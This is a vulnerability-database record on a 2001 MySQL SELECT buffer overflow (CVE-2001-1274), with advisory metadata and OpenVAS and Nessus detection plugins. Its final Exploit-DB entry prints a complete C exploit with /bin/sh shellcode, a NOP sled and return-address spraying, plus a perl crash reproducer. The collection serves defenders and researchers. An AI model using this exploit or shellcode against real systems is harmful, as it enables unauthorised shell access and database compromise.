{"osvdb": [{"lastseen": "2017-04-28T13:20:05", "bulletinFamily": "software", "cvelist": ["CVE-2001-1274"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.mysql.com/\nRedHat RHSA: RHSA-2001:003\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-01/0327.html\nISS X-Force ID: 5969\n[CVE-2001-1274](https://vulners.com/cve/CVE-2001-1274)\nBugtraq ID: 2262\n", "modified": "2001-01-18T00:00:00", "published": "2001-01-18T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:9907", "id": "OSVDB:9907", "type": "osvdb", "title": "MySQL select Command Remote Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1274"], "description": "The remote host is missing an update to mysql\nannounced via advisory DSA 013-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53776", "href": "http://plugins.openvas.org/nasl.php?oid=53776", "type": "openvas", "title": "Debian Security Advisory DSA 013-1 (mysql)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_013_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 013-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Nicolas Gregoire has reported a buffer overflow in the mysql server\nthat leads to a remote exploit. An attacker could gain mysqld\nprivileges (and thus gaining access to all the databases).\n\nWe recommend you upgrade your mysql package immediately.\";\ntag_summary = \"The remote host is missing an update to mysql\nannounced via advisory DSA 013-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20013-1\";\n\nif(description)\n{\n script_id(53776);\n script_cve_id(\"CVE-2001-1274\");\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 14:24:38 +0100 (Thu, 17 Jan 2008)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 013-1 (mysql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mysql-doc\", ver:\"3.22.32-4\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"3.22.32-4\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"3.22.32-4\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mysql\", ver:\"4.0.3pl1-0potato1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-06T09:44:28", "description": "Nicolas Gregoire has reported a buffer overflow in the mysql server\nthat leads to a remote exploit. An attacker could gain mysqld\nprivileges (and thus gaining access to all the databases).", "edition": 24, "published": "2004-09-29T00:00:00", "title": "Debian DSA-013 : MySQL - remote buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1274"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "p-cpe:/a:debian:debian_linux:mysql"], "id": "DEBIAN_DSA-013.NASL", "href": "https://www.tenable.com/plugins/nessus/14850", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-013. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14850);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2001-1274\");\n script_bugtraq_id(2262);\n script_xref(name:\"DSA\", value:\"013\");\n\n script_name(english:\"Debian DSA-013 : MySQL - remote buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Nicolas Gregoire has reported a buffer overflow in the mysql server\nthat leads to a remote exploit. An attacker could gain mysqld\nprivileges (and thus gaining access to all the databases).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2001/dsa-013\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the mysql package immediately.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2001/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"mysql-client\", reference:\"3.22.32-4\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"mysql-doc\", reference:\"3.22.32-4\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"mysql-server\", reference:\"3.22.32-4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-01T04:14:36", "description": "The version of MySQL installed on the remote host allows a remote\nattacker to exploit a buffer overflow and crash the server, or even\nexecute arbitrary code.", "edition": 28, "published": "2012-01-18T00:00:00", "title": "MySQL < 3.23.31 Buffer Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1274"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:mysql:mysql"], "id": "MYSQL_3_23_31.NASL", "href": "https://www.tenable.com/plugins/nessus/17817", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17817);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/15 20:50:21\");\n\n script_cve_id(\"CVE-2001-1274\");\n\n script_name(english:\"MySQL < 3.23.31 Buffer Overflow\");\n script_summary(english:\"Checks version of MySQL Server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is vulnerable to a buffer overflow.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MySQL installed on the remote host allows a remote\nattacker to exploit a buffer overflow and crash the server, or even\nexecute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2001/Jan/306\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MySQL version 3.23.31 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:mysql\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(fixed:'3.23.31', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:51:15", "description": "A security problem exists in all versions of MySQL after 3.23.2 and\nprior to 3.23.31. The problem is that the SHOW GRANTS command could be\nexecuted by any user making it possible for anyone with a MySQL\naccount to get the crypted password from the mysql.user table. The new\n3.23.31 version fixes this.\n\nDue to library changes, the previously announced PHP update\n(MDKSA-2001:013) has been updated as well so that the php-mysql module\nsupports this new version of MySQL. It also corrects the upgrade\nscripts in the package, however you will still need to verify that PHP\nsupport is enabled in your /etc/httpd/conf/httpd.conf Apache\nconfiguration file and verify that the installed modules are\nuncommented in your /etc/php.ini file.\n\nUpdate :\n\nPrevious versions of MySQL also suffered from a buffer overflow\nproblem that has been corrected in the recent releases. This update\nfixes the buffer overflow problem in the MySQL packages provided with\nLinux- Mandrake 7.1 and Corporate Server 1.0.1.", "edition": 24, "published": "2012-09-06T00:00:00", "title": "Mandrake Linux Security Advisory : MySQL (MDKSA-2001:014-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1275", "CVE-2001-1274"], "modified": "2012-09-06T00:00:00", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:7.2", "p-cpe:/a:mandriva:linux:php-gd", "p-cpe:/a:mandriva:linux:MySQL-bench", "p-cpe:/a:mandriva:linux:MySQL-shared", "p-cpe:/a:mandriva:linux:php-dba_gdbm_db2", "p-cpe:/a:mandriva:linux:php-ldap", "cpe:/o:mandrakesoft:mandrake_linux:7.1", "p-cpe:/a:mandriva:linux:php-readline", "p-cpe:/a:mandriva:linux:php-pgsql", "p-cpe:/a:mandriva:linux:mod_php", "p-cpe:/a:mandriva:linux:MySQL-devel", "p-cpe:/a:mandriva:linux:php-imap", "p-cpe:/a:mandriva:linux:MySQL-client", "p-cpe:/a:mandriva:linux:php-devel", "p-cpe:/a:mandriva:linux:MySQL-shared-libs", "p-cpe:/a:mandriva:linux:php-mysql", "p-cpe:/a:mandriva:linux:php-manual", "p-cpe:/a:mandriva:linux:MySQL", "p-cpe:/a:mandriva:linux:php"], "id": "MANDRAKE_MDKSA-2001-014.NASL", "href": "https://www.tenable.com/plugins/nessus/61888", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2001:014. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61888);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2001-1274\", \"CVE-2001-1275\");\n script_xref(name:\"MDKSA\", value:\"2001:014-1\");\n\n script_name(english:\"Mandrake Linux Security Advisory : MySQL (MDKSA-2001:014-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A security problem exists in all versions of MySQL after 3.23.2 and\nprior to 3.23.31. The problem is that the SHOW GRANTS command could be\nexecuted by any user making it possible for anyone with a MySQL\naccount to get the crypted password from the mysql.user table. The new\n3.23.31 version fixes this.\n\nDue to library changes, the previously announced PHP update\n(MDKSA-2001:013) has been updated as well so that the php-mysql module\nsupports this new version of MySQL. It also corrects the upgrade\nscripts in the package, however you will still need to verify that PHP\nsupport is enabled in your /etc/httpd/conf/httpd.conf Apache\nconfiguration file and verify that the installed modules are\nuncommented in your /etc/php.ini file.\n\nUpdate :\n\nPrevious versions of MySQL also suffered from a buffer overflow\nproblem that has been corrected in the recent releases. This update\nfixes the buffer overflow problem in the MySQL packages provided with\nLinux- Mandrake 7.1 and Corporate Server 1.0.1.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MySQL\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MySQL-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MySQL-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MySQL-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MySQL-shared\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MySQL-shared-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mod_php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dba_gdbm_db2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2001/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"MySQL-3.22.32-5.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"MySQL-bench-3.22.32-5.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"MySQL-client-3.22.32-5.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"MySQL-devel-3.22.32-5.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"MySQL-shared-libs-3.22.32-5.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"MySQL-3.23.31-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"MySQL-bench-3.23.31-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"MySQL-client-3.23.31-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"MySQL-devel-3.23.31-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"MySQL-shared-3.23.31-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"mod_php-4.0.4pl1-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"php-4.0.4pl1-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"php-dba_gdbm_db2-4.0.4pl1-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"php-devel-4.0.4pl1-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"php-gd-4.0.4pl1-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"php-imap-4.0.4pl1-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"php-ldap-4.0.4pl1-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"php-manual-4.0.4pl1-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"php-mysql-4.0.4pl1-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"php-pgsql-4.0.4pl1-1.2mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"php-readline-4.0.4pl1-1.2mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T14:34:04", "description": "Mysql 3.22.x/3.23.x Local Buffer Overflow Vulnerability. CVE-2001-1274. Local exploit for linux platform", "published": "2001-01-18T00:00:00", "type": "exploitdb", "title": "Mysql 3.22.x/3.23.x - Local Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-1274"], "modified": "2001-01-18T00:00:00", "id": "EDB-ID:20581", "href": "https://www.exploit-db.com/exploits/20581/", "sourceData": "source: http://www.securityfocus.com/bid/2262/info\r\n\r\nMySQL is a widely used Open Source database tool. Versions of MySQL up to and including 3.23.30 are vulnerable to a buffer overflow attack.\r\n\r\nBy supplying an excessively long string as an argument for a SELECT statement, it is possible for a local attacker to overflow mysql's query string buffer.\r\n\r\nAs a result of this overflow, excessive data copied onto the stack can overwrite critical parts of the stack frame such as the calling function's return address. Since this data is supplied by the user, it can be made to alter the program's flow of execution. \r\n\r\n/*\r\n\r\n Linux MySQL Exploit by Luis Miguel Silva [aka wC]\r\n lms@ispgaya.pt\r\n 19/01/y2k+1\r\n\r\n Compile:\r\n\r\n gcc MySQLXploit.c -o MySQLX\r\n\r\n Run with:\r\n\r\n You can specify the offset for the exploit passing it as the 1st arg...\r\n\r\n Example: ./MySQLX 0 ---> this is the default offset :]\r\n\r\n Advisorie:\r\n [from a bugtraq email]\r\n\r\n Hi,\r\n\r\n all versions of MySQL < 3.23.31 have a buffer-overflow which crashs the\r\n server and which seems to be exploitable (ie. 4141414 in eip)\r\n\r\n Problem :\r\n An attacker could gain mysqld privileges (gaining access to all the\r\n databases)\r\n\r\n Requirements :\r\n You need a valid login/password to exploit this\r\n\r\n Solution :\r\n Upgrade to 3.23.31\r\n\r\n Proof-of-concept code :\r\n None\r\n\r\n Credits :\r\n I'm not the discoverer of this bug\r\n The first public report was made by tharbad@kaotik.org via the MySQL\r\n mailing-list\r\n See the following mails for details\r\n\r\n Regards,\r\n Nicob\r\n\r\n Here the original post to the MySQL mailing-list :\r\n ==================================================\r\n\r\n On Jan 12, Jo?o Gouveia wrote:\r\n > Hi,\r\n >\r\n I believe i've found a problem in MySql. Here are some test's i've made\r\nin\r\n > 3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't\r\n > debug it, just tested to see if crashes ).Confirmed up to latest 3.23\r\n\r\n > On one terminal:\r\n > <quote>\r\n > spike:/var/mysql # /sbin/init.d/mysql start\r\n > Starting service MySQL.\r\n > Starting mysqld daemon with databases from /var/mysql\r\n > done\r\n > spike:/var/mysql #\r\n ></quote>\r\n >\r\n > On the other terminal:\r\n > <quote>\r\n > jroberto@spike:~ > msql -p -e 'select a.'`perl\r\n-e'printf(\"A\"x130)'`'.b'\r\n > Enter password:\r\n > (hanged..^C)\r\n > </quote>\r\n >\r\n > On the first terminal i got:\r\n > <quote>\r\n > sike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation\r\nfault\r\n > nohup\r\n > $ledir/myqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR\r\n--skip-lockin\r\n > g \"$@\" >>$err_log 2>&1>\r\n > Number of processes running now: 0\r\n > mysqld restarted on Fri Jan 12 07:10:54 WET 2001\r\n > mysqld daemon ended\r\n > </quote>\r\n >\r\n > gdb shows the following:\r\n > <quote>\r\n > (gdb) run\r\n > Starting program: /usr/sbin/mysqld\r\n > [New Thread 16897 (manager thread)]\r\n > [New Thread 16891 (initial thread)]\r\n > [New Thread 16898]\r\n > /usr/sbin/mysqld: ready for connections\r\n > [New Thread 16916]\r\n > [Switching to Thread 16916]\r\n >\r\n > Program received signal SIGSEGV, Segmentation fault.\r\n > 0x41414141 in ?? ()\r\n > (gdb) info all-registers\r\n > eax 0x1 1\r\n > ecx 0x68 104\r\n > edx 0x8166947 135686471\r\n > ebx 0x41414141 1094795585\r\n > esp 0xbf5ff408 0xbf5ff408\r\n > ebp 0x41414141 0x41414141\r\n > esi 0x41414141 1094795585\r\n > edi 0x0 0\r\n > eip 0x41414141 0x41414141\r\n > eflags 0x10246 66118\r\n > cs 0x23 35\r\n > ss 0x2b 43\r\n > ds 0x2b 43\r\n > es 0x2b 43\r\n > fs 0x0 0\r\n > gs 0x0 0\r\n > (gdb)\r\n > </quote>\r\n >\r\n > looks like a tipical overflow to me.\r\n > Please reply asap, at least to tell me i'me not seeing things. :-)>\r\n > Best regards,\r\n >\r\n > Joao Gouveia aka Tharbad.\r\n >\r\n > tharbad@kaotik.org\r\n\r\n Here the reponse to a email I send today to the MySQL list :\r\n ============================================================\r\n\r\n Sergei Golubchik (MySQL team) wrote :\r\n >\r\n > Hi!\r\n >\r\n > On Jan 18, Nicolas GREGOIRE wrote:\r\n > > Hi,\r\n > >\r\n > > Still not any info about the buffer-overflow discovered last week ?\r\n > > Shouldn't be fixed at the beginning of the week ?\r\n > >\r\n > > Please, dear MySQL team, give us info !!\r\n > >\r\n > > Regards,\r\n > > Nicob\r\n >\r\n > Fixed in latest release (3.23.31).\r\n >\r\n > Regards,\r\n > Sergei\r\n\r\n Here an part of the 3.23.30 to 3.23.31 diff :\r\n =============================================\r\n\r\n +Changes in release 3.23.31\r\n +--------------------------\r\n +\r\n + * Fixed security bug in something (please upgrade if you are using a\r\n + earlier MySQL 3.23 version).\r\n\r\n End of Advisorie\r\n\r\n Final Words: Yes..i'm still alive...<g> [just a'sleep..]\r\n\r\n A big kiss to niness and hugs to all my friends...\r\n lucipher && all of the unsecurity.org crew...\r\n JFA and all of the AngelSP [pseudo :P]'crew...\r\n Ahmm...i just wave everybody :]\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n\r\n#define DEFAULT_OFFSET 0\r\n#define DEFAULT_BUFFER_SIZE 130\r\n#define NOP 0x90\r\n\r\n// Our EVIL code...\r\nchar shellcode[] =\r\n \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\"\r\n \"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\"\r\n \"\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh\";\r\n\r\nunsigned\r\nlong get_sp(void) {\r\n __asm__(\"movl %esp,%eax\");\r\n}\r\n\r\n// Where it all happens...\r\nmain(int argc, char *argv[])\r\n{\r\n char *buffer, *ptr, tmp[1500];\r\n long *addr_ptr, addr;\r\n int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET;\r\n\r\n printf(\"\\nMySQL [al versions < 3.23.31] Local Exploit by\r\nlms@ispgaya.pt\\n\\n\");\r\n if (argc==2) offset=atoi(argv[1]);\r\n else\r\n printf(\"Happy toughts: Did you know you can pass a offset as argv[1]? :]\\n\");\r\n\r\n printf(\"Trying to allocate memory for buffer (%d bytes)...\",bsize);\r\n if (!(buffer = malloc(bsize))) {\r\n printf(\"ERROR!\\n\");\r\n printf(\"Couldn't allocate memory...\\n\");\r\n printf(\"Exiting...\\n\");\r\n exit(0);\r\n }\r\n printf(\"SUCCESS!\\n\");\r\n addr=get_sp()-offset;\r\n printf(\"Using address : 0x%x\\n\", addr);\r\n printf(\"Offset : %d\\n\",offset);\r\n printf(\"Buffer Size : %d\\n\",bsize);\r\n ptr=buffer;\r\n addr_ptr=(long *) ptr;\r\n for (i=0;i<bsize;i+=4) *(addr_ptr++)=addr;\r\n for (i=0;i<bsize/2;i++) buffer[i]=NOP;\r\n ptr=buffer+((bsize/2)-(strlen(shellcode)/2));\r\n for (i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i];\r\n buffer[bsize-1]='\\0';\r\n snprintf(tmp,sizeof(tmp),\"mysql -p -e 'select a.'%s'.b'\",buffer);\r\n printf(\"Oh k...i have the evil'buffer right here :P\\n\");\r\n printf(\"So...[if all went well], prepare to be r00t...\\n\");\r\n system(tmp);\r\n}\r\n\r\n\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": 